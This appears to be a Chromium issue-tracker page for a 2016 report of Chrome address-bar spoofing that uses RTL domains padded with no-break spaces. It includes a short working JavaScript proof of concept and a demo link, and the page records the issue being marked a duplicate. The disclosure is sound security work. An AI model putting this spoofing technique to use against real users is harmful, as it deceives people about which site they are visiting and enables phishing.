Issue metadata
Sign in to add a comment
|
Security: Chrome RTL+ No-break space URL Spoofing
Reported by
xis...@gmail.com,
Nov 15 2016
|
||||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
RTL URLs make IP address to the left side of the Chrome Omnibox.Unicode U+00A0 is no-break space,which will display blank in the Chrome Omnibox. A lot of no-break space will hide the real domain.
VERSION
Chrome Version: [54.0.2840.98] + [stable]
Operating System: [Windows7&10,MAC10.12.1,IOS10.2,Android7.0]
REPRODUCTION CASE
POC:
<script>
function aa(){
var link = document.createElement('a');
link.href = 'http://xn--ggbla1c4e.xn--ngbc5azd/?'+Array(0x50).join("%C2%A0")+'127.0.0.1';
link.target="aaaa";
document.body.appendChild(link);
link.click();
}
</script>
<a onclick="aa();" href="javascript:void(0);">CLICK ME</a>
Online Demo:http://xisigr.com/test/spoof/chrome/rtl_1.html
,
Nov 15 2016
,
Nov 16 2016
I think this is most related to Issue 656417 . It's essentially the same exploit but using NBSPs instead of other weak-direction characters. I'll dupe this, but be sure to add this to the list of examples.
,
Aug 30 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by mea...@chromium.org
, Nov 15 2016Owner: mgiuca@chromium.org